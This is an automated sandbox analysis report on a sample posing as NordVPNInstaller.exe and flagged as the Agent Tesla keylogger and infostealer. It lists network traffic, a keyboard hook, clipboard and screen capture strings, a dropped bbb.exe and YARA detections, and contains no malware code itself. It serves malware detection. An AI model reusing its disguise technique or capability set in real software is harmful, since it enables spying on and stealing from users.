Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Detected Agent Tesla keylogger

Source: NordVPNInstaller.exe, 00000000.00000000.1663885964.0000000000932000.00000002.00000001.01000000.00000003.sdmp	Memory string: get_Clipboard
Source: NordVPNInstaller.exe, 00000000.00000000.1663885964.0000000000932000.00000002.00000001.01000000.00000003.sdmp	Memory string: set_Sendwebcam
Source: NordVPNInstaller.exe, 00000000.00000000.1663885964.0000000000932000.00000002.00000001.01000000.00000003.sdmp	Memory string: get_ComputerName
Source: NordVPNInstaller.exe, 00000000.00000000.1663885964.0000000000932000.00000002.00000001.01000000.00000003.sdmp	Memory string: get_UserName

Contains functionality to capture screen (.Net source)

Source: NordVPNInstaller.exe, B.cs	.Net Code: O_U
Source: bbb.exe.0.dr, B.cs	.Net Code: O_U

Installs a global keyboard hook

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\NordVPNInstaller.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\bbb\bbb.exe			Jump to behavior

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: NordVPNInstaller.exe, type: SAMPLE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: NordVPNInstaller.exe, type: SAMPLE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: NordVPNInstaller.exe, type: SAMPLE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: NordVPNInstaller.exe, type: SAMPLE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.0.NordVPNInstaller.exe.94af90.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 0.0.NordVPNInstaller.exe.94af90.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.0.NordVPNInstaller.exe.94af90.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.0.NordVPNInstaller.exe.94af90.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.0.NordVPNInstaller.exe.930000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 0.0.NordVPNInstaller.exe.930000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.0.NordVPNInstaller.exe.930000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.0.NordVPNInstaller.exe.930000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: NordVPNInstaller.exe PID: 3524, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant Author: j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!
Source: Process Memory Space: bbb.exe PID: 1196, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant Author: j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, type: DROPPED	Matched rule: AgentTesla Payload Author: kevoreilly
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, type: DROPPED	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, type: DROPPED	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, type: DROPPED	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen

Yara detected AgentTesla

Source: Yara match	File source: Process Memory Space: NordVPNInstaller.exe PID: 3524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bbb.exe PID: 1196, type: MEMORYSTR
Source: Yara match	File source: NordVPNInstaller.exe, type: SAMPLE
Source: Yara match	File source: 0.0.NordVPNInstaller.exe.94af90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.NordVPNInstaller.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1663885964.0000000000932000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, type: DROPPED

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Memory allocated: 70350000 page read and write	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Memory allocated: 70D50000 page read and write	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Memory allocated: 70850000 page read and write	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Memory allocated: 71250000 page read and write	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Memory allocated: 71750000 page read and write	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Memory allocated: 71C50000 page read and write	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Memory allocated: 72150000 page read and write	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Memory allocated: 72B00000 page read and write	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Memory allocated: 73E00000 page read and write	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Memory allocated: 77040000 page read and write	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Memory allocated: 77A40000 page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Memory allocated: 70350000 page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Memory allocated: 70850000 page read and write	Jump to behavior

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_05DE2D92 NtQuerySystemInformation,	0_2_05DE2D92
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_05DE2D57 NtQuerySystemInformation,	0_2_05DE2D57
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_05932EBA NtQuerySystemInformation,	4_2_05932EBA
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_05932E7F NtQuerySystemInformation,	4_2_05932E7F

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_053D2C7C	0_2_053D2C7C
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_053D0F78	0_2_053D0F78
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_053D3E4F	0_2_053D3E4F
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_053D0F68	0_2_053D0F68
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_053D1299	0_2_053D1299
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_065932C8	0_2_065932C8
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_0669D300	0_2_0669D300
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_0669A7E8	0_2_0669A7E8
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_06695550	0_2_06695550
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_0669A138	0_2_0669A138
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_0669A7D9	0_2_0669A7D9
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_066951A8	0_2_066951A8
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_067F4120	0_2_067F4120
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_05022A21	4_2_05022A21
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_05020F78	4_2_05020F78
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_05020F69	4_2_05020F69
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_05021299	4_2_05021299
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_0606081C	4_2_0606081C
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_060648A1	4_2_060648A1
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_0606D300	4_2_0606D300
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_0606A138	4_2_0606A138
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_06065550	4_2_06065550
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_0606A7E8	4_2_0606A7E8
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_060651A8	4_2_060651A8
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_0606A7D9	4_2_0606A7D9
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_060741E0	4_2_060741E0
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_06072FFC	4_2_06072FFC
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 5_2_056D0F78	5_2_056D0F78
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 5_2_056D0F69	5_2_056D0F69
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 5_2_056D1299	5_2_056D1299

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 12572

Source: NordVPNInstaller.exe

Static PE information: invalid certificate

Source: NordVPNInstaller.exe, 00000000.00000002.2780165235.00000000065A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameIELibrary.dll4 vs NordVPNInstaller.exe
Source: NordVPNInstaller.exe, 00000000.00000000.1663885964.0000000000969000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs NordVPNInstaller.exe
Source: NordVPNInstaller.exe, 00000000.00000002.2764791326.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorwks.dllT vs NordVPNInstaller.exe
Source: NordVPNInstaller.exe, 00000000.00000000.1663885964.0000000000932000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIELibrary.dll4 vs NordVPNInstaller.exe
Source: NordVPNInstaller.exe, 00000000.00000000.1663885964.0000000000932000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamefirefox.exe4 vs NordVPNInstaller.exe
Source: NordVPNInstaller.exe	Binary or memory string: OriginalFilenameIELibrary.dll4 vs NordVPNInstaller.exe
Source: NordVPNInstaller.exe	Binary or memory string: OriginalFilenamefirefox.exe4 vs NordVPNInstaller.exe
Source: NordVPNInstaller.exe	Binary or memory string: OriginalFileName vs NordVPNInstaller.exe

Source: NordVPNInstaller.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: NordVPNInstaller.exe, type: SAMPLE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: NordVPNInstaller.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: NordVPNInstaller.exe, type: SAMPLE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: NordVPNInstaller.exe, type: SAMPLE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.0.NordVPNInstaller.exe.94af90.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 0.0.NordVPNInstaller.exe.94af90.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.0.NordVPNInstaller.exe.94af90.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.0.NordVPNInstaller.exe.94af90.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.0.NordVPNInstaller.exe.946cb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.0.NordVPNInstaller.exe.930000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: 0.0.NordVPNInstaller.exe.930000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.0.NordVPNInstaller.exe.930000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.0.NordVPNInstaller.exe.930000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: NordVPNInstaller.exe PID: 3524, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant date = 2018/2, filetype = memory, reference3 = agent tesla == negasteal -- @coldshell, author = j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!, version = stealer, reference1 = https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection, reference2 = https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a
Source: Process Memory Space: bbb.exe PID: 1196, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant date = 2018/2, filetype = memory, reference3 = agent tesla == negasteal -- @coldshell, author = j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!, version = stealer, reference1 = https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection, reference2 = https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, type: DROPPED	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, type: DROPPED	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, type: DROPPED	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload

Source: NordVPNInstaller.exe, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: NordVPNInstaller.exe, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: NordVPNInstaller.exe, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: NordVPNInstaller.exe, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: NordVPNInstaller.exe, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: NordVPNInstaller.exe, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: NordVPNInstaller.exe, DJW.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: NordVPNInstaller.exe, DJW.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: bbb.exe.0.dr, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: bbb.exe.0.dr, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: bbb.exe.0.dr, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: bbb.exe.0.dr, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: bbb.exe.0.dr, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: bbb.exe.0.dr, B.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/7@2/2

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_05DE244E AdjustTokenPrivileges,	0_2_05DE244E
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Code function: 0_2_05DE2417 AdjustTokenPrivileges,	0_2_05DE2417
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_05932576 AdjustTokenPrivileges,	4_2_05932576
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 4_2_0593253F AdjustTokenPrivileges,	4_2_0593253F
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 5_2_06222576 AdjustTokenPrivileges,	5_2_06222576
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Code function: 5_2_0622253F AdjustTokenPrivileges,	5_2_0622253F

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

File created: C:\Users\user\AppData\Roaming\bbb

Jump to behavior

Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Mutant created: NULL
